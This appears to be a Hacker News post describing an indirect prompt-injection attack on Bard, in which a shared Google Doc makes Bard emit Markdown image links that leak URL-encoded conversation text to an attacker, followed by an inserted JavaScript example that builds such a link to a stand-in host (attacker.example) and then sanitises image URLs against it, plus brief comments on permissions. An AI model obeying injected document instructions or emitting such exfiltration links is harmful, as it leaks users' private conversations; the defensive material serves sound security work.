Hacker News
by colemannugent 955 days ago
TLDR: Bard will render Markdown images in conversations. Bard can also read the contents of your Google docs to give responses more context. By sharing a Google Doc containing a malicious prompt with a victim you could get Bard to generate Markdown image links with URL parameters containing URL encoded sections of your conversation. These sections of the conversation can then be exfiltrated when the Bard UI attempts to load the images by reaching out to the URL the attacker had Bard previously create.

Moral of the story: be careful what your AI assistant reads; it could be controlled by an attacker and contain hypnotic suggestions.
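The exfiltration shape described in the post, together with the renderer-side check that defeats it, as an added example that is not part of the original post and not Bard's or Google's code. The conversation fragment and the attacker host `attacker.example` are constructed for the demo; the allowlist origin `images.example.com` is likewise an assumption. The idea is that the injected prompt makes the assistant emit a Markdown image whose URL carries URL-encoded conversation text, and the UI leaks it by fetching the image; the fix is to render only images from an allowlisted origin and to reject any image URL that carries a query string or fragment.

```javascript
// Added example (not from the original post, not Bard's code).
// Demonstrates Markdown-image exfiltration and a renderer-side guard.

// Minimal matcher for ![alt](url "title"); a real UI would use its
// Markdown parser's AST instead of a regex.
const IMAGE_RE = /!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)/g;

// Constructed sample data: a conversation fragment an attacker wants,
// and a hypothetical attacker-controlled host.
const CONVERSATION_FRAGMENT = "Q3 budget is 40k, meeting with Acme at 3pm";
const ATTACKER_HOST = "https://attacker.example";

// What an injected instruction could make the assistant emit: the
// fragment is URL-encoded into an image URL alongside a benign image.
function buildExfilMarkdown(fragment) {
  return (
    "Here is your summary.\n\n" +
    `![summary](${ATTACKER_HOST}/pixel.png?d=${encodeURIComponent(fragment)})\n\n` +
    "![logo](https://images.example.com/logo.png)"
  );
}

// Collect every image URL in a Markdown string.
function extractImageUrls(markdown) {
  const urls = [];
  for (const m of markdown.matchAll(IMAGE_RE)) urls.push(m[2]);
  return urls;
}

// Policy: https only, origin on the allowlist, no query string, no
// fragment, no embedded credentials. The query-string rule is what stops
// the exfiltration, since that is where the encoded text travels.
function isAllowedImage(rawUrl, allowedOrigins) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return false; // relative or malformed: do not fetch
  }
  if (url.protocol !== "https:") return false;
  if (url.search !== "" || url.hash !== "") return false;
  if (url.username !== "" || url.password !== "") return false;
  return allowedOrigins.includes(url.origin);
}

// Replace disallowed images with their alt text before rendering, so the
// browser never issues the request that would carry the data out.
function sanitizeMarkdownImages(markdown, allowedOrigins) {
  let blocked = 0;
  const out = markdown.replace(IMAGE_RE, (whole, alt, url) => {
    if (isAllowedImage(url, allowedOrigins)) return whole;
    blocked += 1;
    return alt ? `[image removed: ${alt}]` : "[image removed]";
  });
  return { markdown: out, blocked };
}

// Demo run on the constructed sample.
const sample = buildExfilMarkdown(CONVERSATION_FRAGMENT);
const result = sanitizeMarkdownImages(sample, ["https://images.example.com"]);
console.log(result.markdown);
console.log(`blocked ${result.blocked} image(s)`);
```

The check belongs on the UI side because the model cannot be trusted to refuse the injected instruction; even with an allowlist, note that a host you do allow could still leak data through path components, so the allowlist should name image origins that the attacker cannot write to.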

1 comment

Looks like we need a system of permissions like Android and iOS have for apps.
Hopefully it'll be tightly scoped and not like, hey I need access to read/create/modify/delete all your calendar events and contacts just so I can check if you are busy
This is a good illustration of the current state of permissions for mobile apps.